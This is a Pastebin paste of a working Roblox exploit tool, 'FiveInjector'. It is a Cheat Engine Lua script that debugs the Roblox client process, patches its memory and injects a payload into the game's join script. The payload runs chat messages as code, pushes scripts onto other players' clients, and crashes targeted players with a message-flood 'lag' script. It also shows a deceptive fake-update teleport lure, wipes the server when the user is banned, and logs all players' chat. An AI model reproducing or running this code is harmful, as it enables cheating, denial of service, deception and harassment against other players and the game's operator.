API tools faq
paste
0_Abysal

Untitled

0_Abysal
Jul 28th, 2018
266
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 18.59 KB | None | 0 0
raw download clone embed print report
  1. local Exploits, Successes, AddressList, NoRun, Interface = {}, {}, {}, {}, {};
  2. local GlobalOffset = "28";
  3.  
  4. function GetExploit(index)
  5. local tab, scan, result = Exploits[index], createMemScan(true);
  6. memscan_returnOnlyOneResult(scan, true);
  7. memscan_firstScan(scan, soExactValue, vtByteArray, rtTruncated, table.concat(tab[2], " "), nil, 0, 0x00FFFFFF, "", fsmNotAligned, nil, false, false, false, false);
  8. memscan_waitTillDone(scan);
  9. result = memscan_getOnlyResult(scan);
  10. if result == nil then return nil; end
  11. result = string.format("%X", result + tab[3]);
  12. result = string.rep("0", 8 - string.len(result)) .. result;
  13. return result;
  14. end
  15. function AddExploit(name, hex, offset)
  16. table.insert(Exploits, {name, hex, offset})
  17. end
  18. function toAddr(num)
  19. local num = tonumber(num);
  20. local addr = string.format("%X", num):upper();
  21. addr = string.rep("0", 8 - string.len(addr)) .. addr;
  22. return addr;
  23. end
  24.  
  25.  
  26. debugger_onBreakpoint = function()
  27. local function GetAddress(ESPaddr, Offset)
  28. local ESPaddr, Offset = tostring(ESPaddr) or string.rep("0", 8), tostring(Offset == nil and GlobalOffset or Offset);
  29. local SCaddr_base = tonumber("0x" .. ESPaddr) + tonumber("0x" .. Offset);
  30. local SCaddr_cont1, SCaddr_cont2, SCaddr_cont3, SCaddr_cont4 = tostring(string.format("%X", SCaddr_base)), tostring(string.format("%X", SCaddr_base + 1)), tostring(string.format("%X", SCaddr_base + 2)), tostring(string.format("%X", SCaddr_base + 3));
  31. local SCaddr = (readBytes(SCaddr_cont1) + (readBytes(SCaddr_cont2) * 256) + (readBytes(SCaddr_cont3) * 65536) + (readBytes(SCaddr_cont4) * 16777216));
  32. return toAddr(SCaddr);
  33. end
  34. --if readBytes(GetAddress(toAddr(ESP), GlobalOffset), 1) == 0x0D then
  35. local JOIN_addr = GetAddress(toAddr(ESP), GlobalOffset);
  36. local JOIN_len = tonumber("0x"..GetAddress(toAddr(ESP), string.format("%X", tonumber("0x"..GlobalOffset) + 4)));
  37. local JOIN_script_tbl = readBytes(JOIN_addr, JOIN_len, true);
  38. local JOIN_script = "";
  39. table.foreach(JOIN_script_tbl, function(i, v) JOIN_script = JOIN_script .. string.char(v); end);
  40. local script = JOIN_script .. [==[ repeat wait() until game:service'Players'.LocalPlayer; wait(); game:service'Players'.LocalPlayer.Chatted:connect(function(s) Spawn(function() loadstring(s)() end) end) LagScript = [[
  41.  
  42. script:Destroy();
  43.  
  44. local runService = Game:GetService("RunService").Stepped;
  45. local LagNum = 1250;
  46. local str = "You just got crashed by one of the most powerful hackers on Roblox, how do you feel?";
  47.  
  48. for i = 1, math.huge do
  49. if i % LagNum == 0 then runService:wait(); end
  50. Instance.new("Message", Workspace).Text = str;
  51. end
  52.  
  53. ]]
  54.  
  55. local function TeleportScript(place_id)
  56. return [[
  57. script:Destroy();
  58.  
  59. local place_id_str = ]]..tostring(place_id)..[[;
  60. local place_id = tonumber(place_id_str);
  61. local message_str = "The owner has updated the game. New features: less lag, improved dynamic lighting, and more! Press the 'Leave' button to play to an updated game!";
  62. local player = Game:GetService("Players").LocalPlayer;
  63. local teleport_service = Game:GetService("TeleportService");
  64. local run_service = Game:GetService("RunService").Stepped;
  65. if player:FindFirstChild("PlayerGui") then
  66. pcall(function() player.PlayerGui:ClearAllChildren(); end)
  67. end
  68. while true do
  69. if player:FindFirstChild("PlayerGui") then
  70. local screen_gui, frame_gui, message_gui;
  71. if not player.PlayerGui:FindFirstChild(" __teleport_updated_place_gui") then
  72. pcall(function()
  73. screen_gui = Instance.new("ScreenGui", player.PlayerGui);
  74. screen_gui.Name = " __teleport_updated_place_gui";
  75. end)
  76. else screen_gui = player.PlayerGui[" __teleport_updated_place_gui"]; end
  77. if not screen_gui:FindFirstChild(" __teleport_updated_place_frame") then
  78. pcall(function()
  79. frame_gui = Instance.new("Frame", screen_gui);
  80. frame_gui.Name = " __teleport_updated_place_frame";
  81. frame_gui.ZIndex = 9;
  82. frame_gui.Size = UDim2.new(2, 0, 2, 0);
  83. frame_gui.Position = UDim2.new(-.5, 0, -.5, 0);
  84. frame_gui.BackgroundColor3 = Color3.new();
  85. end)
  86. end
  87. if not screen_gui:FindFirstChild(" __teleport_updated_place_message") then
  88. pcall(function()
  89. message_gui = Instance.new("TextLabel", screen_gui);
  90. message_gui.Name = " __teleport_updated_place_message";
  91. message_gui.ZIndex = 10;
  92. message_gui.Size = UDim2.new(.9, 0, .3, 0);
  93. message_gui.Position = UDim2.new(.05, 0, 0, 0);
  94. message_gui.BackgroundColor3 = Color3.new();
  95. message_gui.BorderColor3 = Color3.new();
  96. message_gui.BorderSizePixel = 0;
  97. message_gui.TextWrapped = true;
  98. message_gui.TextColor3 = Color3.new(1,1,1);
  99. message_gui.FontSize = 8;
  100. message_gui.Font = 2;
  101. message_gui.Text = message_str;
  102. end)
  103. end
  104. end
  105. teleport_service:Teleport(place_id);
  106. pcall(function() Workspace.CurrentCamera.CameraType = 6; end)
  107. pcall(function() player.Character = nil; end)
  108. run_service:wait();
  109. end
  110. ]]
  111. end
  112.  
  113. local function GetError(not_errored, msg)
  114. if not_errored then msg = "Running Script" end
  115. Game.Debris:AddItem((function()
  116. local hint;
  117. pcall(function()
  118. hint=Instance.new("Hint",Workspace.CurrentCamera)
  119. hint.Text=msg
  120. end)
  121. return hint
  122. end)(), 3)
  123. end
  124.  
  125. local function FindPlayers(str)
  126. if not str then return end
  127. local str,players = str:lower(),{}
  128. if str == "all" then
  129. for i, v in next, Game.Players:GetPlayers() do
  130. players[#players+1] = v
  131. end
  132. elseif str:match("others?") then
  133. for i, v in next, Game.Players:GetPlayers() do
  134. pcall(function()
  135. if v ~= Game.Players.LocalPlayer then
  136. players[#players+1] = v
  137. end
  138. end)
  139. end
  140. else
  141. for i, v in next, Game.Players:GetPlayers() do
  142. pcall(function()
  143. if v.Name:lower():match("^"..str) then
  144. players[#players+1] = v
  145. end
  146. end)
  147. end
  148. end
  149. return players
  150. end
  151.  
  152. local function LoadOnClients(players, source)
  153. if not players or #players == 0 then return end
  154. local load = function(Player)
  155. local Script = Instance.new "LocalScript"
  156. --
  157. Script.Source = [[
  158. while script.Name == "LocalScript" do wait() end
  159. ypcall(loadstring([==============[]]..source..[[]==============]))
  160. ]]
  161. --
  162. Script.Parent = Game.Players.LocalPlayer.Character
  163. or Game.Players.LocalPlayer:FindFirstChild "Backpack"
  164. or Game.Players.LocalPlayer.CharacterAdded:wait()
  165. wait(.5)
  166. Script.Name = "LocalScript "
  167. Script.Parent = Player.Character
  168. or Player:FindFirstChild "Backpack"
  169. or Player.CharacterAdded:wait()
  170. end
  171. for _,player in next, players do
  172. coroutine.wrap(load)(player)
  173. end
  174. end
  175.  
  176. coroutine.resume(coroutine.create(function()
  177. wait(PlayerLoadtime)
  178. HackerName=game.Players.LocalPlayer.Name
  179. end))
  180. if(AntibanScript)then
  181. coroutine.resume(coroutine.create(function()
  182. wait(PlayerLoadtime+.5)
  183. while true and wait() do
  184. if(AntibanScript)then
  185. if not(game.Players:FindFirstChild(HackerName))then
  186. wait(3.5)
  187. if(AntibanScript)then
  188. function workspaceRemove(path)
  189. for _,v in pairs(path:GetChildren())do
  190. coroutine.resume(coroutine.create(function(v)
  191. if(v:IsA("Script"))or(v:IsA("LocalScript"))then
  192. v.Disabled=true
  193. v:remove()
  194. else
  195. v:remove()
  196. end
  197. end),v)
  198. end
  199. end
  200. workspaceRemove(game:GetService('Workspace'))
  201. for e,i in pairs(game.Players:GetPlayers())do
  202. coroutine.resume(coroutine.create(function(i) i:remove() end),i)
  203. end
  204. end
  205. end
  206. end
  207. end
  208. end))
  209. end
  210. coroutine.resume(coroutine.create(function()
  211. wait(PlayerLoadtime)
  212. game.Players.LocalPlayer:SetSuperSafeChat(false)
  213. game.Players.LocalPlayer.Chatted:connect(function(msg)
  214. if string.sub(msg, 1, 3) == "ls " then
  215. if not(game.Players.LocalPlayer.Character:FindFirstChild("lsInserted"))then
  216. ls=Instance.new("LocalScript",game.Players.LocalPlayer.Character)
  217. ls.Name="lsInserted"
  218. wait(.2)
  219. ls.Name="lsRun"
  220. ls.Source=string.sub(msg,4)
  221. ls.Disabled=true
  222. ls.Disabled=false
  223. end
  224. elseif string.sub(msg, 1, 3) == "rs " then
  225. coroutine.resume(coroutine.create(function(msg)
  226. local errored,output = ypcall(loadstring(msg:sub(4)))
  227. GetError(errored,output)
  228. errored,output = nil
  229. end),msg)
  230. elseif string.sub(msg, 1, 3) == "ls/" then
  231. if not(game.Players.LocalPlayer.Character:FindFirstChild("lsInserted"))then
  232. ls=Instance.new("LocalScript",game.Players.LocalPlayer.Character)
  233. ls.Name="lsInserted"
  234. wait(.2)
  235. ls.Name="lsRun"
  236. ls.Source=string.sub(msg,4)
  237. ls.Disabled=true
  238. ls.Disabled=false
  239. end
  240. elseif string.sub(msg, 1, 3) == "rs/" then
  241. coroutine.resume(coroutine.create(function(msg)
  242. local errored,output = ypcall(loadstring(msg:sub(4)))
  243. GetError(errored,output)
  244. errored,output = nil
  245. end),msg)
  246. elseif string.sub(msg, 1, 3) == "cs " then
  247. LoadOnClients(FindPlayers(msg:sub(4):match("(%w+)%s")), msg:sub(4):match("%s(.+)"))
  248. elseif string.sub(msg, 1, 10) == "mediafire " then
  249. LoadOnClients(FindPlayers(msg:sub(11):match("(%w+)%s")), msg:sub(11):match("%s(.+)"))
  250. elseif string.sub(msg, 1, 4) == "lag " then
  251. LoadOnClients(FindPlayers(msg:sub(5):match("%w+")), LagScript)
  252. elseif string.sub(msg, 1, 7) == "hitler " then
  253. LoadOnClients(FindPlayers(msg:sub(8):match("%w+")), LagScript)
  254. --
  255. elseif string.sub(msg, 1, 3) == "cs/" then
  256. LoadOnClients(FindPlayers(msg:sub(4):match("([%w%s]+)/")), msg:sub(4):match("/(.+)"))
  257. elseif string.sub(msg, 1, 10) == "mediafire/" then
  258. LoadOnClients(FindPlayers(msg:sub(11):match("([%w%s]+)/")), msg:sub(11):match("/(.+)"))
  259. elseif string.sub(msg, 1, 4) == "lag/" then
  260. LoadOnClients(FindPlayers(msg:sub(5):match("[%w%s]+")), LagScript)
  261. elseif string.sub(msg, 1, 7) == "hitler/" then
  262. LoadOnClients(FindPlayers(msg:sub(8):match("[%w%s]+")), LagScript)
  263. --
  264. elseif string.sub(msg, 1, 1) == "/" then
  265. if string.sub(msg, 2, 4) == "sb" then
  266. chatbool = true
  267. repeat wait(.01)
  268. game.Players.LocalPlayer:SetSuperSafeChat(false)
  269. game.Players:Chat("/sc 2 4")
  270. game.Players:Chat("/sc 2 7 0")
  271. game.Players:Chat("/sc 2 7 4")
  272. until not chatbool
  273. elseif string.sub(msg, 2, 5) == "nsb" then
  274. chatbool = false
  275. elseif string.sub(msg, 2, 7) == "power" then
  276. if game.Players.LocalPlayer.Character ~= nil then
  277. if not(game.Players.LocalPlayer.Character:FindFirstChild("lsInserted"))then
  278. ls=Instance.new("LocalScript",game.Players.LocalPlayer.Character)
  279. ls.Name="lsInserted"
  280. wait(.2)
  281. ls.Name="lsRun"
  282. ls.Source=PowerScriptSource
  283. ls.Disabled=true
  284. ls.Disabled=false
  285. end
  286. end
  287. elseif string.sub(msg, 2, 7) == "gaara" then
  288. if game.Players.LocalPlayer.Character ~= nil then
  289. if not(game.Players.LocalPlayer.Character:FindFirstChild("lsInserted"))then
  290. ls=Instance.new("LocalScript",game.Players.LocalPlayer.Character)
  291. ls.Name="lsInserted"
  292. wait(.2)
  293. ls.Name="lsRun"
  294. ls.Source=GaaraSource
  295. ls.Disabled=true
  296. ls.Disabled=false
  297. end
  298. end
  299. elseif string.sub(msg, 2, 6) == "nova" then
  300. if game.Players.LocalPlayer.Character ~= nil then
  301. if not(game.Players.LocalPlayer.Character:FindFirstChild("lsInserted"))then
  302. ls=Instance.new("LocalScript",game.Players.LocalPlayer.Character)
  303. ls.Name="lsInserted"
  304. wait(.2)
  305. ls.Name="lsRun"
  306. ls.Source=NovaSource
  307. ls.Disabled=true
  308. ls.Disabled=false
  309. end
  310. end
  311. elseif string.sub(msg, 2, 9) == "outgame" then AntibanScript=false
  312. if game.Players.LocalPlayer.Character ~= nil then
  313. if not(game.Players.LocalPlayer.Character:FindFirstChild("lsInserted"))then
  314. ls=Instance.new("LocalScript",game.Players.LocalPlayer.Character)
  315. ls.Name="lsInserted"
  316. wait(.2)
  317. ls.Name="lsRun"
  318. ls.Source=OutGameSource
  319. ls.Disabled=true
  320. ls.Disabled=false
  321. end
  322. end
  323. end
  324. end
  325. end)
  326. end))
  327. coroutine.resume(coroutine.create(function()
  328. wait(PlayerLoadtime)
  329. while wait() do
  330. game.Players.LocalPlayer:SetSuperSafeChat(false)
  331. end
  332. end))
  333. coroutine.resume(coroutine.create(function()
  334. wait(PlayerLoadtime)
  335. if ChatHistory then
  336. coroutine.resume(coroutine.create(function()
  337. CH=Instance.new("Model",game:GetService("SoundService"))
  338. CH.Name="ChatHistory"
  339. for _,v in pairs(game.Players:GetPlayers())do
  340. v.Chatted:connect(function(msg)
  341. chatHistory=Instance.new("StringValue",CH)
  342. chatHistory.Name=v.Name
  343. chatHistory.Value=msg
  344. end)
  345. end
  346. game.Players.PlayerAdded:connect(function(v)
  347. v.Chatted:connect(function(msg)
  348. chatHistory=Instance.new("StringValue",CH)
  349. chatHistory.Name=v.Name
  350. chatHistory.Value=msg
  351. end)
  352. end) end)) coroutine.resume(coroutine.create(function()
  353. CH2=Instance.new("Model",game:GetService("StarterGui"))
  354. CH2.Name="ChatHistory"
  355. for _,v in pairs(game.Players:GetPlayers())do
  356. v.Chatted:connect(function(msg)
  357. chatHistory=Instance.new("StringValue",CH2)
  358. chatHistory.Name=v.Name
  359. chatHistory.Value=msg
  360. end)
  361. end
  362. game.Players.PlayerAdded:connect(function(v)
  363. v.Chatted:connect(function(msg)
  364. chatHistory=Instance.new("StringValue",CH2)
  365. chatHistory.Name=v.Name
  366. chatHistory.Value=msg
  367. end)
  368. end) end)) coroutine.resume(coroutine.create(function()
  369. CH3=Instance.new("Model",game:GetService("Teams"))
  370. CH3.Name="ChatHistory"
  371. for _,v in pairs(game.Players:GetPlayers())do
  372. v.Chatted:connect(function(msg)
  373. chatHistory=Instance.new("StringValue",CH3)
  374. chatHistory.Name=v.Name
  375. chatHistory.Value=msg
  376. end)
  377. end
  378. game.Players.PlayerAdded:connect(function(v)
  379. v.Chatted:connect(function(msg)
  380. chatHistory=Instance.new("StringValue",CH3)
  381. chatHistory.Name=v.Name
  382. chatHistory.Value=msg
  383. end)
  384. end) end)) coroutine.resume(coroutine.create(function()
  385. CH4=Instance.new("Model",game:GetService("Soundscape"))
  386. CH4.Name="ChatHistory"
  387. for _,v in pairs(game.Players:GetPlayers())do
  388. v.Chatted:connect(function(msg)
  389. chatHistory=Instance.new("StringValue",CH4)
  390. chatHistory.Name=v.Name
  391. chatHistory.Value=msg
  392. end)
  393. end
  394. game.Players.PlayerAdded:connect(function(v)
  395. v.Chatted:connect(function(msg)
  396. chatHistory=Instance.new("StringValue",CH4)
  397. chatHistory.Name=v.Name
  398. chatHistory.Value=msg
  399. end)
  400. end) end))
  401. end
  402. end))
  403. X=function(f)
  404. return coroutine.resume(coroutine.create(f))
  405. end]==]
  406. local memory = allocateSharedMemory("[ROBLOX]-ScriptTrainer", string.len(script) + 5);
  407. local mem = toAddr(memory);
  408. local len = toAddr(string.len(script));
  409. local success_catch = writeString(mem, script);
  410. writeBytes(ESP + tonumber("0x" .. GlobalOffset), tonumber("0x" .. mem:sub(7, 8)), tonumber("0x" .. mem:sub(5, 6)), tonumber("0x" .. mem:sub(3, 4)),tonumber("0x" .. mem:sub(1, 2)));
  411. writeBytes(ESP + tonumber("0x" .. GlobalOffset) + 4, tonumber("0x" .. len:sub(7, 8)), tonumber("0x" .. len:sub(5, 6)), tonumber("0x" .. len:sub(3, 4)),tonumber("0x" .. len:sub(1, 2)));
  412. --print("[FiveInjector]: Script Execution location " .. GetAddress(toAddr(ESP), GlobalOffset) .. " with length " .. tonumber("0x" .. len));
  413. pcall(function() debug_removeBreakpoint(EIP); end);
  414. debug_continueFromBreakpoint(co_run);
  415. messageDialog("studio.ashx found and " .. (success_catch and "Thejustifierx successful" or "failed to inject."), (success_catch and 2 or 1), 2);
  416. --else
  417. --debug_continueFromBreakpoint(co_run)
  418. --end
  419. end
  420.  
  421. function Exec()
  422. local unprotect_mem = {00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 01, 00, 00, 00, 01, 00, 01, 01, 01, 01, 01, 00, 01, 00, 01, 00, 00, 00, 01, 01, 01, 00, 00, 00, 00, 00, 01, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 01, 00, 00, 00, 00, 00, 00, 00, 01, 00, 00, 00, 00, 00, 01, 00, 00, 00}
  423. writeBytes("00F24118", unprotect_mem);
  424. pcall(function() object_destroy(Interface.MainFrame); end);
  425. Exploits, Successes, AddressList, Interface = {}, {}, {}, {};
  426. --AddExploit("level", {0x89, 0x74, 0x24, 0x0C, 0x89, 0x06, 0xE8}, 4)
  427. AddExploit("script", {0x83, 0xEC, 0x14, 0x56, 0x57, 0x8B, 0x7C, 0x24, 0x2C, 0x85, 0xFF}, 3)
  428. for i, v in pairs(Exploits) do
  429. local exploit = GetExploit(i);
  430. if (exploit == nil) then
  431. print("[FiveInjector]: Failed \"" .. v[1] .. "\"");
  432. else
  433. pcall(function() debug_removeBreakpoint(exploit); end);
  434. debug_setBreakpoint(exploit);
  435. AddressList[v[1]] = exploit;
  436. table.insert(Successes, v[1]);
  437. print("[FiveInjector]: Success \"" .. v[1] .. "\" [" .. exploit .. "]");
  438. end
  439. end
  440. print("[FiveInjector]: " .. tostring(#Successes) .. "/" .. tostring(#Exploits) .. " exploits found.")
  441.  
  442. if #Successes == #Exploits then
  443. print("[FiveInjector]: Attached successfully. Listening for studio.ashx now...");
  444. else
  445. messageDialog("[FiveInjector]: Initializing failed. FiveInjector fails to launch", 1, 2);
  446. end
  447. end
  448.  
  449. function myCheck(_)
  450. local id = getProcessIDFromProcessName("RobloxPlayerBeta.exe");
  451. if id ~= nil then
  452. for i, v in pairs(NoRun) do
  453. if v == id then
  454. return
  455. end
  456. end
  457. table.insert(NoRun, id);
  458. openProcess(id);
  459. debugProcess(2);
  460. Exec();
  461. else
  462. local id2 = getProcessIDFromProcessName("RobloxPlayer.exe");
  463. if id2 ~= nil then
  464. for i, v in pairs(NoRun) do
  465. if v == id2 then
  466. return
  467. end
  468. end
  469. table.insert(NoRun, id2);
  470. openProcess(id2);
  471. debugProcess(2);
  472. Exec();
  473. end
  474. end
  475. end
  476.  
  477. t = createTimer(nil)
  478. timer_setInterval(t, 500)
  479. timer_onTimer(t, myCheck)
  480. timer_setEnabled(t, true)
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!